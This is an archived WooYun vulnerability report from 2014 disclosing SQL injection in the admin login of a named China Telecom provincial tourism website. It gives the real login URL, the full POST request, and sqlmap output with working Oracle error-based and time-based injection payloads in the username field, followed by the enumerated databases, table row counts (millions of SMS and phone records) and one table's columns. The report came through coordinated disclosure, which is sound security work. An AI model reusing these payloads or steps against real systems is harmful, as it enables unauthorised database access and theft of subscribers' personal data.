当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082767

漏洞标题:中国电信某省级网站SQL注入(疑似影响千万数据)

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2014-11-11 15:27

修复时间:2014-12-26 15:28

公开时间:2014-12-26 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-11: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-24: 细节向核心白帽子及相关领域专家公开
2014-12-04: 细节向普通白帽子公开
2014-12-14: 细节向实习白帽子公开
2014-12-26: 细节向公众公开

简要描述:

没错是千万
错是千万
是千万
千万

...

详细说明:

黑龙江电信数字旅游门户网站_后台管理维护
链接:http://www.gzbg100.cn/sysadmin/Login.aspx

16.jpg


登陆处存在注入,用户名密码输入',直接报错

17.jpg


验证码只会验证是否有效,不会过期
post请求

POST /sysadmin/Login.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.gzbg100.cn/sysadmin/Login.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.gzbg100.cn
Content-Length: 361
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=w0ctrju5zcbqdw55uiot0h45
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJOTI4MjE5NjI1ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnBmGi4hqICb4u6KAz35K7NqMua7k%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBgKXyKGvBAKl1bKzCQKd%2B7qdDgKY2YWXBgKC3IeGDAKNt7ybCQwP4hOwri06ABc6B3P7yglAd%2FNk&txtUserName=aaa&txtPwd=aaa&txtCheckCode=6146&btnLogin.x=0&btnLogin.y=0


漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7718=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(111)||CHR(103)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (7718=7718) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(102)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'dHGr'='dHGr&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJOTI4MjE5NjI1D2QWAgIDD2QWAgIHDw9kFgIeB29uY2xpY2sFFHJldHVybiBjaGVja0lucHV0KCk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUIYnRuTG9naW4FCGJ0blNwUmVnB5/qvGwf8XhrP/uBSB+IpTzXwNU=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBgLaxv3UCQKl1bKzCQKd+7qdDgKY2YWXBgKC3IeGDAKNt7ybCV7wzdzOvML8yuz7RZElCgc5cuOr&txtUserName=aaa' AND 7855=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uHrR'='uHrR&txtPwd=aaa&txtCheckCode=0441&btnLogin.x=0&btnLogin.y=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
current schema (equivalent to database on Oracle):    'SYSMANAGER'
current user is DBA:    False
available databases [18]:
[*] COUPON
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSMANAGER
[*] SYSTEM
[*] TG
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SYSMANAGER
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| SMSSEND_BACK                | 9966936 |
| SMS_APP_PHONES              | 8387577 |
| TBCUSTCOUNT                 | 897976  |
| SMSSEND                     | 743361  |
| TBCOUPONCARD                | 231471  |
| TB_GUEST_INFO               | 177577  |
| TB_ADV_CLICK                | 133270  |
| TEMP_SMS                    | 56955   |
| TB_COMMON_GUESTCOMMENT      | 22868   |
| TB_SSOLOGS                  | 19428   |
| RESTINFO                    | 13752   |
| RESTPIC                     | 9474    |
| TB_LOGINFO                  | 8270    |
| TB_HDM_PICTURE              | 3506    |
| TB_TLSUBPAGE_MAPTO_SCENIC   | 884     |
| TB_DINING_BASICINFO         | 694     |
| TB_TRAVEL_REGUSER           | 663     |
| SMS_APP_MESSAGES            | 609     |
| TBCOUPON                    | 595     |
| TB_TRAVEL_LINEPLAN          | 528     |
| TB_KEYWORDS_FILTER          | 525     |
| TB_NEWS_INFO                | 454     |
| TB_SCENIC_INFO              | 425     |
| TB_CODEDEFINE               | 409     |
| TB_SCENIC_RESERVE           | 332     |
| TB_AUTHORITY                | 329     |
| TB_SCENIC_INFO_BAK_0528     | 318     |
| TB_COMPLAINT                | 290     |
| TB_MARKET_INFO              | 271     |
| TB_HOTEL_BASEINFO           | 269     |
| TB_PLAY_BASEINFO            | 261     |
| TB_PERFORMER_INFO           | 242     |
| TBTERMINALTRAD              | 228     |
| TB_USERROLE                 | 163     |
| TBMERCHANT                  | 157     |
| TB_SCENIC_BAK               | 149     |
| TB_TRAVELINE_SUBPAGE_LEVEL2 | 149     |
| TB_ADV_INCOME               | 141     |
| TB_TRAVEL_LINE              | 132     |
| TB_ADV_DETAIL               | 126     |
| TB_USERINFO                 | 124     |
| TB_ORDER_HOTEL              | 115     |
| TB_VALIDCODE                | 113     |
| TB_FUNCTIONS111             | 103     |
| TB_FUNCTIONSBAK             | 103     |
| TB_FUNCTIONS                | 92      |
| TB_RAFFLE                   | 60      |
| TB_ORDER_SCENIC             | 55      |
| TB_TRAVEL_INFO              | 48      |
| TB_BALANCE                  | 42      |
| TB_COMMON_PAGESETINFO       | 40      |
| TBCATE                      | 40      |
| SMS_APP_USERINFO            | 39      |
| TB_ADV_LIMIT                | 34      |
| TB_ORDER_DINING             | 34      |
| TB_ADV_INFO                 | 30      |
| TB_TRAVELINE_SUBPAGE_LEVEL1 | 28      |
| TB_ORDER_PLAY               | 26      |
| MISSM_MESSAGE               | 24      |
| TB_KNOWLEDGEBASE_INFO       | 24      |
| TB_PAYLOG                   | 22      |
| TB_USR_INFO                 | 19      |
| TB_ROLES                    | 18      |
| TB_MISSMNEWS_INFO           | 17      |
| TB_NEWS_COLUMN              | 17      |
| TBCOUPOUORDER               | 16      |
| TB_ORDER_LINE               | 15      |
| TB_TRAVEL_BUSTYPE           | 15      |
| TB_DINING_CUISINETYPE       | 14      |
| TB_TRAVEL_GUIDE             | 14      |
| TB_TRAVEL_INCOME            | 14      |
| TB_AREA                     | 13      |
| TB_AREA_WEATHERURL          | 13      |
| TB_BUSINESS_INFO            | 13      |
| TB_TUAN_CITY                | 13      |
| TB_TRAVEL_GROUP             | 12      |
| TB_HOTEL_GROOMTYPE          | 10      |
| TB_MOBILE_AREA              | 10      |
| TB_MOBILE_VOUCHER           | 10      |
| TB_MOBILE_CODEDEFINE        | 9       |
| TB_CALENDAR                 | 8       |
| TB_MOBILE_SERVICE           | 8       |
| TB_SHOPPING_SCENIC          | 8       |
| TB_DEPARTMENT               | 7       |
| TB_MOBILE_CATEGORY          | 7       |
| TB_MOBILE_POSITION          | 7       |
| TB_MOBILE_SPACE             | 7       |
| TB_TUAN_DINGDAN             | 7       |
| TB_FAVORITES                | 6       |
| TB_MOBILE_COMPANY           | 6       |
| TB_MOBILE_CUSTOMER          | 6       |
| TMP_TESTORDER               | 6       |
| TB_ADVANCE_BOOKING          | 5       |
| TB_DINING_CUISINEINFO       | 5       |
| TB_TRAVEL_BUSINFO           | 5       |
| TBCOUPONUSER                | 5       |
| TB_KNOWLEDGEBASE_TYPE       | 4       |
| TB_MOBILE_PARAMETER         | 4       |
| TB_MOBILE_PRODUCT           | 4       |
| TB_PRIVILEGE                | 4       |
| TB_TUAN_CODEDEFINE          | 4       |
| TB_HOTEL_RESERVE            | 3       |
| TB_MOBILE_BOOKING           | 3       |
| TB_ORDER_THEMES             | 3       |
| TB_SSOSITE                  | 3       |
| TB_TUAN_USER                | 3       |
| TB_MOBILE_ADDRESS           | 2       |
| TB_MOBILE_ALBUM             | 2       |
| TB_MOBILE_MEDIA             | 2       |
| TB_MOBILE_SESSION           | 2       |
| TB_NEWS_TITLEPREV           | 2       |
| TB_TUAN_USERRELATION        | 2       |
| TB_BARCODE_CONFIG           | 1       |
| TB_MOBILE_AROUND            | 1       |
| TB_MOBILE_CAMERA            | 1       |
| TB_MOBILE_CRITICAL          | 1       |
| TB_MOBILE_DAILY             | 1       |
| TB_MOBILE_LOCATION          | 1       |
| TB_NEWS_CONTENTTEMPLATE     | 1       |
| TB_ROLLINFO                 | 1       |
| TB_TUAN_BBS                 | 1       |
| TB_TUAN_PROJECTS            | 1       |
| TB_VERSION                  | 1       |
+-----------------------------+---------+
Database: SYSMANAGER
Table: SMSSEND_BACK
[10 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| ADDDATE    | DATE     |
| CONTENT    | VARCHAR2 |
| OUT_SMSID  | NUMBER   |
| PHONENUM   | VARCHAR2 |
| SENDDATE   | DATE     |
| SENDNUM    | VARCHAR2 |
| SENDRESULT | NUMBER   |
| SENDSTATUS | NUMBER   |
| SMSID      | NUMBER   |
| TYPE       | NUMBER   |
+------------+----------+
数据就不贴了~

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-14 17:46

厂商回复:

最新状态:

暂无